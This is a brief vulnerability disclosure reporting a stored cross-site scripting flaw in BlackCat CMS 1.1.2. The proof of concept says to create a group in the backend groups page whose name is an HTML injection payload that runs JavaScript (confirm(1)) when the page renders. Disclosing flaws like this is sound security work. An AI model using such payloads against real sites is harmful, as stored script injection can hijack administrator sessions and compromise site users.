?# Affected software: black cat cms
# Type of vulnerability:stored xss
# URL:http://blackcat-cms.org/
# Discovered by: provensec
# Website: provensec.com
#version:BlackCat CMS 1.1.2
# Proof of concept?
goto ad group page
http://demo.opensourcecms.com/blackcat/backend/groups/index.php
and and new group with name as xss payload "><img src=d onerror=confirm(1);>
and javascript will execute
